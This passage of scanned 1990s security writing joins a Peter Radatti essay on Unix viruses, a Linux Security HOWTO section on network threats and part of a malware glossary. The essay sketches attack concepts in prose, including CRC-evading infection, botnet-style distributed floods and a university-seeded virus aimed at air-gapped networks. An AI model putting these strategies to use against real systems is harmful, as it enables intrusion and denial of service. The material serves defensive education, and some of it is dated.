inated without  destroying  the  usefulness  of  the  system. 
Discretionary  Access  Control  (DAC)  is  not  protection  against 
software  attacks  because  it  is  a weak  form  of  protection  that 
can  be  bypassed  and,  as  discretionary,  is  at  the  control  of  the 
end  users  who  very  often  ignore  it.  Sites  where  the  majority  of 
the  files  on  the  system  have  no  DAC  protection  are  normal. 
(Many  Unix  sites  have  permission  bit  settings  of  777  which 
allow  anyone  to  read,  write,  execute  or  modify  the  file.) 
Mandatory  Access  Controls  (MAC)  also  has  little  effect  on  virus 
activity  for  the  same  reasons,  although  MAC  can  be  configured 
to  be  neither  weak  nor  easy  to  bypass.  Each  time  a virus  attacks 
an  executable  file  owned  by  a different  user,  it  takes  on  the  full 
privileges  of  that  user,  including  access  to  files  of  other  users 
whose  permissions  intersect  the  DAC  and  MAC  permission  sets 
of  the  infected  user.  On  all  systems,  the  need  to  share  files 
forces  the  creation  of  users  who  exist  in  multiple  permission 
sets.  This  multiple  membership  allows  viruses  to  move  between 
MAC  compartments  and  levels.  The  reduction  of  multiple  mem- 
bership users  will  slow  the  advance  of  a virus  but  will  not  elim- 
inate it.  Finally,  once  a virus  gains  access  to  an  operator 
account  (root,  operator,  isso)  it  cannot  be  stopped  by  any  form 
of  control. 

Inspection  is  the  traditional  way  of  locating  both  known 
holes  in  operating  systems  and  in  locating  known  viruses.  The 
key  word  here  is  “known”.  System  audit  tools  such  as  COPS, 
SATAN  and  others  can  only  locate  holes  that  are  known  to 
them.  Virus  scanners  can  only  locate  viruses  that  are  known  to 
them.  This  means  that  a virus  scanner  or  inspection  tool  is 
obsolete  even  before  it  is  shipped  from  the  factory.  It  can  only 
deal  with  the  past,  never  the  present  or  future  since  conditions 
searched  for  must  exist  at  the  time  of  coding.  Virus  scanner 
have  to  be  constantly  updated.  This  is  becoming  a problem  with 
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the  explosion  of  viruses  being  created  by  new  authors  and  virus 
computer  aided  design  and  manufacturing  tools  (V-CAD/CAM). 

It  has  been  proposed  that  audit  tools  such  as  COPS  can  be 
used  to  deter  virus  infections  because  they  strengthen  the  sys- 
tem’s ability  to  control  access  and  data  movement.  These 
inspection  tools  only  improve  control.  As  stated,  control  does 
not  provide  protection  against  virus  attacks.  It  attempts  to  keep 
outside  people  out  and  inside  people  within  their  areas  of 
authorization. 

The  third  category  of  protection  is  Integrity.  Integrity  sys- 
tems are  intended  to  detect  change.  In  the  MS-DOS  world,  early 
integrity  systems  used  cyclic  redundancy  character,  CRC,  values 
to  detect  change.  A virus  was  then  created  which  countered 
this  protection.  The  virus  determined  the  CRC  value  of  the  tar- 
get file,  infected  it,  and  then  padded  the  file  until  the  CRC 
value  computed  the  same.  Many  Unix  users  still  use  this 
method  of  change  detection,  or  worse,  they  attempt  to  use  the 
date  of  last  modification  as  an  indication  of  change.  The  date  of 
last  modification  can  be  changed  to  any  value  on  Unix  systems 
with  a simple  user  command.  On  many  systems  an  option  of 
the  “touch”  command  provides  this  ability. 

Any  integrity  tool  that  does  not  use  cryptographic  methods 
is  of  little  value.  In  fact,  if  the  integrity  system  fails  to  detect 
critical  changes,  then  the  false  sense  of  security  created  in  the 
system  operator  can  be  devastating  to  the  system.  An  integrity 
tool,  CIT,  was  created  using  the  RSA  Associates  MD5  crypto- 
graphic hash  algorithm.  Since  the  algorithm  is  cryptographic, 
it  can  detect  even  a single  bit  flip  and  cannot  be  misled  by  any 
known  means.  In  addition,  during  the  development  of  CIT,  it 
was  determined  that  it  was  necessary  to  detect  additions  and 
deletions  to  the  file  system  since  these  could  be  indications  of 
non-infectious  attacks  such  as  performed  by  Trojan  horses, 
worms  and  hackers.  In  this  way,  a rolling  baseline  can  be  creat- 
ed that  will  allow  the  system  operator  to  quickly  recover  from 
any  form  of  file  system  attack.  Modifications  to  the  protected 
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file  system  created  by  unauthorized  users  or  software  attacks 
can  be  detected  and  removed.  Using  a tool  of  this  type  allows 
the  administrator  to  locate  the  approximate  time  of  attack 
since  the  modification  will  have  taken  place  between  two 
known  timed  events,  the  last  and  current  execution  of  the 
integrity  tool.  Finally,  integrity  tools  can  be  used  to  determine 
if  a third  party  file  has  been  modified  or  tampered  with  prior 
to  use.  Some  manufacturers  of  Unix  operating  systems  now 
publish  MD5  digests  of  their  systems.  Using  these  digests,  it  is 
possible  to  determine  that  the  file  on  your  system  is  exactly  as 
it  should  be.  There  was  no  degradation  from  misreading  the 
installation  media,  deterioration  of  the  disk  system  or  inten- 
tional modification.  If  a manufacturer  does  not  publish  a list, 
then  end  users  can  create  their  own  by  installing  an  operating 
system  on  multiple  systems  from  different  media  sources.  The 
created  digests  of  each  system  should  agree. 

Non-traditional  Categories  Of  Protection  And  Their 
Failure 

In  the  past,  fencing  systems  were  sold  as  a popular  method  of 
virus  protection  on  PC  platforms.  A fencing  system  write  pro- 
tects parts  of  the  disk  using  a hardware  board  that  is  added  to 
the  system  bus.  Since  a virus  cannot  infect  a file  that  is  write 
protected  using  hardware,  it  appears  to  be  a good  method.  The 
obvious  drawback  is  that  the  user  cannot  write  to  the  disk  if  it 
is  write  protected.  The  fencing  system  therefore  had  to  create 
zones  of  protection  so  that  the  user  could  perform  useful  work. 
Viruses  happily  infected  the  unprotected  zones.  Fencing  sys- 
tems appear  to  have  never  been  marketed  for  Unix  systems. 

Projection  Of  Future  Problems 

The  problem  of  attack  software  written  for  and  targeted  against 
Unix  systems  will  continue  to  grow,  especially  now  that  the 
Internet  has  gained  popularity.  Unix  systems  are  the  backbone 
of  the  world  wide  Internet.  Viruses  will  become  more  prevalent 
because  they  provide  all  of  the  benefits  of  other  forms  of  attack 
while  having  few  drawbacks.  Trans-platform  viruses  may 
become  common  as  an  effective  attack.  All  of  the  methods  cur- 
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rently  used  in  creating  MS-DOS  viruses  can  be  ported  to  Unix. 
This  includes  the  creation  of  automated  CAD/CAM  virus  tools, 
stealth,  polymorphism  and  armour.  The  future  of  viruses  on 
Unix  is  already  hinted  at  by  the  wide  spread  use  of  Bots  and 
Kill-Bots,  (slang  term  referring  to  software  robots).  These  pro- 
grams are  able  to  move  from  system  to  system  performing  their 
function.  Using  a Bot  as  a dropper  or  creating  a virus  that 
includes  bot-like  capability  is  simple.  With  the  advent  of  global 
networks,  the  edge  between  viruses,  bots,  worms  and  Trojans 
will  blur.  Attacks  will  be  created  that  use  abilities  from  all  of 
these  forms  and  others  to  be  developed.  There  have  already 
been  cases  where  people  have  used  audit  tools  such  as  COPS 
and  SATAN  to  attack  a system.  Combining  these  tools  with  a 
virus  CAD/CAM  program  will  allow  a fully  functional  virus  fac- 
tory to  create  custom  viruses  and  attacks  against  specific  tar- 
gets such  as  companies  that  are  disliked  by  the  propitiator.  The 
information  services  provided  by  the  Internet  already  provide 
sufficient  information  in  the  form  of  IP  addresses  and  email 
domain  addresses  to  identify,  locate  and  attack  systems  owned 
by  specific  entities. 

Finally,  viruses  and  worms  can  provide  the  perfect  format 
for  a hostage  shielded  denial  of  service  attack.  It  is  well  known 
that  an  Internet  attached  system  can  be  made  to  “disappear”  or 
crash  by  flooding  it  with  IP  packets.  Site  administrators  can 
protect  their  systems  from  crashing  by  programming  their 
local  router  to  filter  out  packets  from  the  attacking  source.  The 
system  will  still  disappear  because  legitimate  users  will  be 
squeezed  out  by  the  flood  of  attack  packets,  but  filtering  at  the 
router  can  at  least  save  the  system  from  crashing. 
Unfortunately,  anyone  can  masquerade  as  someone  else  on  the 
Internet  by  merely  using  their  IP  address.  This  attack  can  send 
a barrage  of  packets  to  the  target  site,  each  of  which  has  a dif- 
ferent source  IP  address.  It  is  not  possible  to  use  a router  to  fil- 
ter from  this  type  of  attack,  but  the  Internet  service  provider 
can  trace  the  source  of  attack  by  physical  channel  without  rely- 
ing upon  the  IP  address.  In  cooperation  with  other  Internet 
providers,  the  attacker  can  be  isolated  from  the  Internet  for  a 
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short  time.  Hopefully,  the  attacker  will  become  bored  and  go 
away  or  can  be  identified  for  action  by  law  enforcement. 
Another  possibility  is  to  use  viruses  to  generate  the  attack.  If  a 
virus  is  successful  in  spreading  to  thousands  of  sites  on  the 
Internet  and  is  programmed  to  start  an  IP  attack  against  a spe- 
cific target  on  the  same  day  at  the  same  time  then  there  is  no 
way  to  stop  the  attack  because  it  has  originated  from  thousands 
of  sites  all  of  which  are  live  hostages.  The  site  under  attack  will 
have  to  go  off  line  since  the  Internet  service  providers  will  be 
helpless  in  the  face  of  a coordinated  dispersed  attack.  Since  the 
impact  against  each  individual  hostage  system  is  low,  the 
hostages  may  not  even  notice  that  there  is  a problem.  The 
Internet  service  provider  attached  to  the  target  system  is  in  the 
best  position  to  detect  the  attack,  however,  they  are  as  subject 
to  this  attack  as  the  target  since  they  may  ‘crash’  from  the 
excessive  bandwidth  usage  flooding  their  network  from  multi- 
ple sources. 

Scenario  Of  A Virus  Attack  Against  A Secure  Unix 
Network 

The  military  and  many  other  companies  believe  that  they  are 
protected  against  focused  attacks  because  they  employ  a closed 
network  configuration.  In  some  cases  these  networks  may  also 
use  highly  secure  ‘B’  rated  operating  systems  [NCSC-TG-006]. 
Typically,  the  network  will  not  allow  modems,  Internet  con- 
nections or  have  any  electronic  connections  to  organizations 
outside  of  the  immediate  need.  In  addition,  the  networks  are 
almost  always  heterogeneous  because  of  legacy  equipment,  pri- 
marily PC  systems.  The  network  designers  normally  allow  the 
PC  systems  to  retain  their  floppy  disk  drives  even  thought  their 
attachment  to  a network  renders  them  nonessential.  Networks 
of  this  type  have  been  considered  secure,  however,  they  are 
open  to  information  warfare  attacks  via  a focused  virus. 
Assuming  that  the  propitiator  is  an  outsider  without  access  to 
the  equipment  or  premises,  one  possible  method  of  attack 
against  this  type  of  network  would  take  advantage  of  both  the 
Typhoid  Mary  Syndrome  and  Trans-platform  Viruses  to  produce 
an  attack  that  is  targeted  against  the  Unix  systems  but  origi- 
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nated  from  an  attached  PC.  A virus  can  be  created  whose  pay- 
load  is  triggered  by  executing  on  a PC  that  is  attached  to  the 
target  network.  This  is  not  hard  with  a little  inside  information 
about  the  configuration  of  the  network.  The  propitiator  would 
then  install  the  virus  at  all  of  the  local  Universities  in  the  hope 
that  someone  working  at  the  installation  is  taking  a night  class 
or  that  one  of  their  children  will  unknowingly  infect  a com- 
mon usage  home  computer.  At  that  point,  the  virus  has  a good 
chance  of  entering  the  target  network.  This  is  a well  known  vec- 
tor and  is  enhanced  because  the  virus  will  not  reveal  itself. 
Once  on  the  target  system,  the  PC  virus  will  act  like  a dropper 
releasing  a Unix  virus  into  the  backbone.  The  payload  virus  may 
be  necessary  because  many  Unix  backbone  systems  are  not  PC 
compatible.  The  Unix  virus  payload  can  then  install  a back  door 
which  can  be  remotely  directed.  In  addition,  the  virus  can  cre- 
ate a covert  channel  by  making  use  of  messenger  viruses.  While 
the  use  of  messenger  viruses  are  slow  and  have  low  bandwidth, 
they  are  bidirectional  and  can  be  used  for  command  and  con- 
trol of  more  complex  attacks. 

Conclusion 

The  problem  of  attack  software  targeted  against  Unix  systems 
will  continue  to  grow.  Viruses  may  become  more  prevalent 
because  they  provide  all  of  the  benefits  of  other  forms  of 
attack,  while  having  few  drawbacks.  Trans-platform  viruses 
may  become  common  as  an  effective  attack.  All  of  the  methods 
currently  used  in  creating  MS-DOS  viruses  can  be  ported  to 
Unix.  This  includes  the  creation  of  automated  CAD/CAM  virus 
tools,  stealth,  polymorphism  and  armour.  The  future  of  viruses 
on  Unix  is  already  hinted  at  by  the  wide  spread  use  of  Bots  and 
Kill-bots  (slang  term  referring  to  software  robots).  These  pro- 
grams are  able  to  move  from  system  to  system  performing  their 
function.  Using  a Bot  as  a dropper  or  creating  a virus  that 
includes  bot  like  capability  is  simple.  With  the  advent  of  global 
networks,  the  edge  between  viruses,  bots,  worms  and  Trojans 
will  blur.  Attacks  will  be  created  that  use  abilities  from  all  of 
these  forms  and  others  to  be  developed.  There  have  already 
been  cases  where  people  have  used  audit  tools  such  as  COPS 
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and  SATAN  to  attack  a system.  Combining  these  tools  with  a 
virus  CAD/CAM  program  will  allow  a fully  functional  virus  fac- 
tory to  create  custom  viruses  to  attack  specific  targets. 

As  these  problems  unfold,  new  methods  of  protection  must 
be  created.  Research  has  hinted  at  several  promising  methods 
of  protection,  including  real  time  security  monitors  that  use 
artificial  intelligence  for  simple  decision  making. 

Even  with  the  current  problems  and  the  promise  of  more 
sophisticated  problems  and  solutions  in  the  future,  the  one 
thing  that  is  believed  to  be  certain  is  that  Unix  or  Unix-like  sys- 
tems will  continue  to  provide  a pay  back  that  is  well  worth  the 
cost  of  operating  them. 

Copyright  © August  1995,  February  1996  by  Peter  V.  Radatti. 

Permission  is  granted  to  any  individual  or  institution  to  use,  copy,  or  redistribute 
this  document  so  long  as  it  is  not  sold  for  profit,  and  provided  that  it  is  repro- 
duced whole  and  this  copyright  notice  is  retained. 
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Linux  Network  Security 

Source:  “Linux  Security  HOWTO” 
available  at 

www.tldp.org/HOWTO/Security-HOWTO/network-security.html 

Network  security  is  becoming  more  and  more  important  as  peo- 
ple spend  more  and  more  time  connected.  Compromising  net- 
work security  is  often  much  easier  than  compromising  physical 
or  local  security,  and  is  much  more  common. 

There  are  a number  of  good  tools  to  assist  with  network 
security,  and  more  and  more  of  them  are  shipping  with  Linux 
distributions. 

Packet  Sniffers 

One  of  the  most  common  ways  intruders  gain  access  to  more 
systems  on  your  network  is  by  employing  a packet  sniffer  on  a 
already  compromised  host.  This  "sniffer"  just  listens  on  the 
Ethernet  port  for  things  like  passwd  and  login  and  su  in  the 
packet  stream  and  then  logs  the  traffic  after  that.  This  way, 
attackers  gain  passwords  for  systems  they  are  not  even  attempt- 
ing to  break  into.  Clear-text  passwords  are  very  vulnerable  to 
this  attack. 

Example:  Host  A has  been  compromised.  Attacker  installs  a snif- 
fer. Sniffer  picks  up  admin  logging  into  Host  B from  Host  C.  It 
gets  the  admins  personal  password  as  they  login  to  B.  Then,  the 
admin  does  a su  to  fix  a problem.  They  now  have  the  root  pass- 
word for  Host  B.  Later  the  admin  lets  someone  telnet  from  his 
account  to  Host  Z on  another  site.  Now  the  attacker  has  a pass- 
word/login on  Host  Z. 

In  this  day  and  age,  the  attacker  doesn’t  even  need  to  com- 
promise a system  to  do  this:  they  could  also  bring  a laptop  or  pc 
into  a building  and  tap  into  your  net. 

Using  ssh  or  other  encrypted  password  methods  thwarts 
this  attack.  Things  like  APOP  for  POP  accounts  also  prevents 
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this  attack.  (Normal  POP  logins  are  very  vulnerable  to  this,  as  is 
anything  that  sends  clear-text  passwords  over  the  network.) 

SATAN,  ISS,  and  Other  Network  Scanners 

There  are  a number  of  different  software  packages  out  there 
that  do  port  and  service-based  scanning  of  machines  or  net- 
works. SATAN,  ISS,  SAINT,  and  Nessus  are  some  of  the  more 
well-known  ones.  This  software  connects  to  the  target  machine 
(or  all  the  target  machines  on  a network)  on  all  the  ports  they 
can,  and  try  to  determine  what  service  is  running  there.  Based 
on  this  information,  you  can  tell  if  the  machine  is  vulnerable  to 
a specific  exploit  on  that  server. 

SATAN  (Security  Administrator’s  Tool  for  Analyzing 
Networks)  is  a port  scanner  with  a web  interface.  It  can  be  con- 
figured to  do  light,  medium,  or  strong  checks  on  a machine  or 
a network  of  machines.  It’s  a good  idea  to  get  SATAN  and  scan 
your  machine  or  network,  and  fix  the  problems  it  finds.  Make 
sure  you  get  the  copy  of  SATAN  from  metalab  or  a reputable  FTP 
or  web  site.  There  was  a Trojan  copy  of  SATAN  that  was  distrib- 
uted out  on  the  net.  http://www.trouble.org/~zen/satan/satan. 
html.  Note  that  SATAN  has  not  been  updated  in  quite  a while, 
and  some  of  the  other  tools  below  might  do  a better  job. 

ISS  (Internet  Security  Scanner)  is  another  port-based  scan- 
ner. It  is  faster  than  Satan,  and  thus  might  be  better  for  large 
networks.  However,  SATAN  tends  to  provide  more  information. 

Abacus  is  a suite  of  tools  to  provide  host-based  security  and 
intrusion  detection.  Look  at  it’s  home  page  on  the  web  for  more 
information,  http://www.psionic.com/abacus/ 

SAINT  is  a updated  version  of  SATAN.  It  is  web-based  and  has 
many  more  up-to-date  tests  than  SATAN.  You  can  find  out  more 
about  it  at:  http://www.wwdsi.com/~saint 

Nessus  is  a free  security  scanner.  It  has  a GTK  graphical 
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interface  for  ease  of  use.  It  is  also  designed  with  a very  nice 
plug  in  setup  for  new  port-scanning  tests.  For  more  informa- 
tion, take  a look  at:  http://www.nessus.org 

Denial  of  Service  Attacks 

Denial  of  service  attacks  have  increased  greatly  in  recent  years. 
Some  of  the  more  popular  and  recent  ones  are  listed  below. 
Note  that  new  ones  show  up  all  the  time,  so  this  is  just  a few 
examples.  Read  the  Linux  security  lists  and  the  bugtraq  list  and 
archives  for  more  current  information. 

o SYN  Flooding  - SYN  flooding  is  a network  denial  of  service 
attack.  It  takes  advantage  of  a "loophole"  in  the  way  TCP  con- 
nections are  created.  The  newer  Linux  kernels  (2.0.30  and  up) 
have  several  configurable  options  to  prevent  SYN  flood 
attacks  from  denying  people  access  to  your  machine  or  serv- 
ices. See  Section  7 for  proper  kernel  protection  options. 


o Pentium  "FOOF"  Bug  - It  was  recently  discovered  that  a series 
of  assembly  codes  sent  to  a genuine  Intel  Pentium  processor 
would  reboot  the  machine.  This  affects  every  machine  with  a 
Pentium  processor  (not  clones,  not  Pentium  Pro  or  PII),  no 
matter  what  operating  system  it’s  running.  Linux  kernels 
2.0.32  and  up  contain  a work  around  for  this  bug,  preventing 
it  from  locking  your  machine.  Kernel  2.0.33  has  an  improved 
version  of  the  kernel  fix,  and  is  suggested  over  2.0.32.  If  you 
are  running  on  a Pentium,  you  should  upgrade  now! 


o Ping  Flooding  - Ping  flooding  is  a simple  brute-force  denial  of 
service  attack.  The  attacker  sends  a "flood"  of  ICMP  packets  to 
your  machine.  If  they  are  doing  this  from  a host  with  better 
bandwidth  than  yours,  your  machine  will  be  unable  to  send 
anything  on  the  network.  A variation  on  this  attack,  called 
"smurfing",  sends  ICMP  packets  to  a host  with  your 
machine’s  return  IP,  allowing  them  to  flood  you  less 
detectably.  You  can  find  more  information  about  the  "smurf1 
attack  at  http://www.quadrunner.com/~chuegen/smurf.txt 
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If  you  are  ever  under  a ping  flood  attack,  use  a tool  like  tcp- 
dump  to  determine  where  the  packets  are  coming  from  (or 
appear  to  be  coming  from),  then  contact  your  provider  with 
this  information.  Ping  floods  can  most  easily  be  stopped  at  the 
router  level  or  by  using  a firewall. 

o Ping  o’  Death  - The  Ping  o’  Death  attack  sends  ICMP  ECHO 
REQUEST  packets  that  are  too  large  to  fit  in  the  kernel  data 
structures  intended  to  store  them.  Because  sending  a single, 
large  (65,510  bytes)  "ping"  packet  to  many  systems  will  cause 
them  to  hang  or  even  crash,  this  problem  was  quickly 
dubbed  the  "Ping  o’  Death."  This  one  has  long  been  fixed,  and 
is  no  longer  anything  to  worry  about. 


o Teardrop  / New  Tear  - One  of  the  most  recent  exploits 
involves  a bug  present  in  the  IP  fragmentation  code  on  Linux 
and  Windows  platforms.  It  is  fixed  in  kernel  version  2.0.33, 
and  does  not  require  selecting  any  kernel  compile-time 
options  to  utilize  the  fix.  Linux  is  apparently  not  vulnerable 
to  the  "newtear"  exploit. 

You  can  find  code  for  most  exploits,  and  a more  in-depth 
description  of  how  they  work,  at  http://www.rootshell.com 
using  their  search  engine. 

VPNs  - Virtual  Private  Networks 

VPN’s  are  a way  to  establish  a "virtual"  network  on  top  of  some 
already-existing  network.  This  virtual  network  often  is  encrypt- 
ed and  passes  traffic  only  to  and  from  some  known  entities  that 
have  joined  the  network.  VPNs  are  often  used  to  connect  some- 
one working  at  home  over  the  public  Internet  to  an  internal 
company  network. 

If  you  are  running  a Linux  masquerading  firewall  and  need 
to  pass  MS  PPTP  (Microsoft’s  VPN  point-to-point  product)  pack- 
ets, there  is  a Linux  kernel  patch  out  to  do  just  that.  See:  ip- 
masq-vpn. 
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There  are  several  Linux  VPN  solutions  available: 

o vpnd.  See  the  http://sunsite.dk/vpnd/. 
o Free  S/Wan,  available  at  http://www.xs4all.nl/~freeswan/ 
o ssh  can  be  used  to  construct  a VPN.  See  the  VPN  mini-howto 
for  more  information. 

o vps  (virtual  private  server)  at  http://www.strongcrypto.com. 
o yawipin  at  http://yavipin.sourceforge.net 
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Adware  or  Ad  ware 

This  is  software  that  downloads  and  displays  advertisements.  This 
kind  of  software  is  often  bundled  with  Freeware. 

Alias 

There  is  no  standard,  accepted  rule  for  naming  viruses.  Hence, 
even  though  informal  groups,  such  as  CARO,  have  discussed  con- 
ventions for  virus  naming,  differences  still  exist  between  antivirus 
software  companies  and  research  organisations.  Thus,  where  the 
term  ‘alias’  or  ‘also  known  as’  occurs,  it  refers  to  different  names 
that  the  same  virus  may  have  been  given  by  other  sources. 

Annoyance 

Any  trojan  that  does  not  cause  any  major  damage,  but  instead 
annoys  a user  by  turning  the  text  on  the  screen  upside  down,  or 
making  mouse  motions  erratic,  and  so  on. 

ANSI  Bomb 

Character  sequences  that  reprogram  specific  keys  on  the  key- 
board. If  ANSI. SYS  is  loaded,  some  bombs  will  display  colourful 
messages,  or  have  interesting  (but  unwanted)  graphical  effects. 

Anti-emulation 

To  reliably  detect  polymorphic  viruses,  scanners  include  code  emu- 
lators to  simulate  the  running  of  executable  code  and  check  whether 
it  decrypts  to  a known  virus.  An  emulator  must  stop  emulating  a pro- 
gram once  it  is  no  longer  necessary,  and  for  performance  reasons 
many  emulators  have  simple  rules  for  quickly  determining  a stop- 
ping point.  Some  polymorphic  viruses  include  tricks  attempting  to 
defeat  these  code  emulators  by  fooling  them  into  quitting  the  emu- 
lation before  the  decryption  code  has  finished  its  work.  Such  meth- 
ods are  commonly  called  anti-emulation  techniques. 

Antivirus  Virus 

The  idea  of  making  an  antivirus  program  viral  so  that  it  can  prop- 
agate to  where  it  is  most  needed  is  a very  old  one.  Such  a program 
would  be  an  antivirus  virus.  It  is  universally  agreed  among  rep- 
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utable  antivirus  researchers  to  be  a very  bad,  even  dangerous, 
idea,  and  should  be  avoided  at  all  costs. 

Anti-heuristic 

Anti-heuristic  techniques  are  efforts  by  virus  writers  to  avoid  their 
code  being  detected  as  a possible  new  virus  by  heuristic  detection. 
What  works  depends  on  heuristics  approaches  of  different  scanners, 
but  some  code  obfuscation  techniques  appear  clearly  anti-heuristic. 

Appender 

A virus  that  inserts  a copy  of  its  code  at  the  end  of  its  victim  file  is 
known  as  an  appender  or  appending  virus,  (c.f.  Cavity  Infector, 
Companion  Virus,  Overwriter,  Prepender) 

Armoured  Virus 

Viruses  that  use  special  tricks  to  make  tracing  them  in  a debugger 
and/or  disassembling  them  difficult  are  said  to  be  ‘armoured’.  The 
purpose  of  armouring  is  primarily  to  hinder  virus  analysts  reach- 
ing a complete  understanding  of  the  virus’  code.  An  early  example 
of  an  armoured  virus  is  Whale. 

AV  Killer 

Any  hacker  tool  intended  to  disable  a user’s  anti-virus  software  to 
help  elude  detection.  Some  will  also  disable  personal  firewalls. 

Backdoor 

A program  that  surreptitiously  allows  access  to  a computer’s 
resources  (files,  network  connections,  configuration  information 
etc.)  via  a network  connection  is  known  as  a backdoor  or  remote 
access  trojan.  Note  that  such  functionality  is  often  included  in 
legitimate  software  designed  and  intended  to  allow  such  access. 

Bait  File,  Goat  File,  Decoy  File 

Some  generic  approaches  to  virus  detection  create  ‘dummy’  pro- 
gram files  which  are  written  to  the  drives  of  the  machines  being 
monitored.  These  files  are  regularly  checked  for  modification,  or 
created,  checked  and  then  deleted.  Such  files  are  sometimes  called 
‘goat  files’,  ‘decoy  files’  or  ‘bait  files’  because  they  are  not  intend- 
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ed  to  be  run  for  any  practicable  purpose,  and  act  solely  as  ‘bait’  to 
trap  and  detect  the  presence  of  an  active  virus. 

Bimorphic  Virus 

An  encrypted  virus  that  has  two  forms  of  the  decryption  code,  usu- 
ally randomly  selecting  between  them  when  writing  its  decryptor 
to  a new  replicant. 

Binder 

A tool  that  combines  two  or  more  files  into  a single  file,  usually  for 
the  purpose  of  hiding  one  of  them. 

BIOS 

Basic  Input/Output  System  is  the  lowest  level  program  in  a PC, 
which  provides  an  interface  with  the  PC’s  hardware.  A PC’s  BIOS  is 
also  responsible  for  initiating  the  operating  system  bootstrap 
process  by  loading  the  boot  sector  of  a diskette  or  the  master  boot 
record  of  a hard  drive  and  passing  control  to  it. 

ActiveX 

ActiveX  controls  are  software  modules  based  on  Microsoft’s 
Component  Object  Model  (COM)  architecture.  On  the  Internet, 
ActiveX  controls  can  be  linked  to  Web  pages  and  downloaded  by 
an  ActiveX-compliant  browser.  ActiveX  controls  turn  Web  pages 
into  software  pages  that  perform  like  any  other  program  launched 
from  a server,  and  can  have  full  system  access.  In  most  instances 
this  access  is  legitimate,  but  one  should  be  cautious  of  malicious 
ActiveX  applications. 

Attachments 

Attachments  are  files  added  to  an  outgoing  e-mail.  In  Microsoft 
e-mail  clients,  e-mail  carrying  an  attachment  will  have  a paper- 
clip type  icon  beside  the  description.  Also  in  Microsoft  e-mail 
clients,  an  icon  representing  the  file  type  will  be  embedded  at 
the  end  of  the  body  of  the  e-mail  message.  Attachments  have 
become  a known  harbinger  of  virus  infection.  Virus  authors  and 
distributors  often  give  the  file  a double  extension.  Users  who  do 
not  have  proper  viewing  settings  configured  in  Internet  Explorer 
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can  be  tricked  into  believing  an  executable  file  is  a benign 
bitmap,  or  graphic,  file.  To  prevent  this,  ensure  file  extension 
viewing  is  enabled  on  the  system. 

Antivirus 

Antivirus  refers  to  the  products  and  technology  used  to  detect 
malicious  code,  prevent  it  from  infecting  your  system,  and 
remove  malicious  code  that  has  infected  the  system.  Typically, 
antivirus  vendors  share  information  and  resources  to  ensure 
rapid  response  to  malicious  code  outbreaks.  Most  antivirus  ven- 
dors participate  in  independent  testing  which  certifies  their 
products  to  detect  or  disinfect  viruses. 

Applet 

Any  miniature  application  transported  over  the  Internet,  especial- 
ly as  an  enhancement  to  a Web  page.  Authors  often  embed  applets 
within  the  HTML  page  as  a foreign  program  type. 

Attack 

An  attempt  to  subvert  or  bypass  a system’s  security.  Attacks  may  be 
passive  or  active.  Active  attacks  attempt  to  alter  or  destroy  data. 
Passive  attacks  try  to  intercept  or  read  data  without  changing  it. 
See  Also:  Brute  Force  Attack,  Denial  of  Service,  Hijacking,  Password 
Attacks,  Password  Sniffing 

Attributes 

Characteristics  assigned  to  all  files  and  directories.  Attributes 
include:  Read  Only,  Archive,  Hidden  or  System. 

Background  Scanning 

A feature  in  some  antivirus  software  to  automatically  scan  files 
and  documents  as  they  are  created,  opened,  closed  or  executed. 

Backup 

The  process  of  creating  duplicate  data.  Some  programs  backup 
data  files  while  maintaining  both  the  current  version  and  the  pre- 
ceding version  on  disk.  However,  a backup  is  not  considered  secure 
unless  it  is  stored  away  from  the  original. 
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Boot  Code 

The  program  recorded  in  a boot  sector  is  known  as  boot  code.  Boot 
sectors  usually  contain  boot  code  because  these  small  programs 
have  the  job  of  starting  to  load  a PCs  operating  system  once  the 
BIOS  completes  its  POST  checks. 

Boot  Infector,  Boot  Sector  Infector,  BSI 

A boot  sector  infector  virus  places  its  starting  code  in  the  boot 
sector.  When  the  computer  tries  to  read  and  execute  the  pro- 
gram in  the  boot  sector,  the  virus  is  loaded  into  the  memory, 
where  it  can  gain  control  over  basic  computer  operations.  From 
the  memory,  a boot  sector  infector  can  spread  to  other  drives 
(floppy,  network  etc.)  on  the  system.  Once  the  virus  is  running, 
it  usually  executes  the  normal  boot  program,  which  it  stores 
elsewhere  on  the  disk. 

Boot  Record 

The  program  recorded  in  the  boot  sector.  This  record  contains 
information  on  the  characteristics  and  contents  of  the  disk  and 
information  needed  to  boot  the  computer.  If  a user  boots  a PC  with 
a floppy  disk,  the  system  reads  the  boot  record  from  that  disk. 

Boot  Sector 

An  area  located  on  the  first  track  of  floppy  disks  and  logical  disks 
that  contain  the  boot  record.  Boot  sector  usually  refers  to  this 
specific  sector  of  a floppy  disk,  whereas  the  term  Master  Boot 
Sector  usually  refers  to  the  same  section  of  a hard  disk.  See  Also: 
Master  Boot  Record 

Boot  Virus 

A virus  that  infects  boot  sectors.  Also,  refer  to  Boot  Sector 
Infector  for  more  details. 

Bug 

An  unintentional  fault  in  a program  that  causes  actions  neither 
the  user  nor  the  program  author  intended. 
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CARO 

It  stands  for  Computer  Antivirus  Research  Organisation,  which  is 
an  informal  group  of  professional  antivirus  researchers  commit- 
ted to  improving  the  state  of  the  art. 

Cavity  Inferior,  Cavity  Virus 

A cavity  virus  overwrites  a part  of  its  host  file  without  increasing 
the  length  of  the  file  while  also  preserving  the  host’s  functionality. 

Class  Infector 

A class  infector  is  a macro  virus  whose  code  resides  in  one  or 
more  class  modules. 

Cluster  Virus,  Link  virus 

Apart  from  directly  infecting  host  files  as  appenders  and  prepen- 
ders  do,  there  are  other  ways  to  intercept  calls  to  an  executable  file 
and  run  malicious  code,  either  before  or  instead  of,  the  code  from 
the  intended  file.  One  such  method  is  cluster  infection,  used  by  a 
small  number  of  DOS  viruses. 

CMOS 

Complementary  Metal  Oxide  Semiconductor:  The  battery  backed 
RAM  used  in  AT  and  later  PCs  to  store  hardware  configuration 
information  uses  CMOS  technology.  As  this  memory  is  not  in  the 
CPU  address  space,  but  addressed  via  I/O  port  reads  and  writes,  its 
contents  cannot  be  directly  executed.  This  means  that  viruses  can- 
not reside  in  nor  infect  the  CMOS  RAM.  Some  viruses  alter  the 
contents  of  the  CMOS  RAM  as  a payload,  either  scrambling  them 
or  removing  the  reference  to  the  floppy  drive  so  the  hard  drive’s 
(infected)  MBR  will  always  run  first  during  boot-up. 

Commercial  RAT 

Any  commercial  product  that  is  normally  used  for  remote  admin- 
istration, but  which  might  be  exploited  to  do  this  without  a user’s 
consent  or  awareness  is  called  a Commercial  RAT.  Also  see  RAT. 
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Companion  Virus 

There  are  more  methods  of  infecting  a system  other  than  the  most 
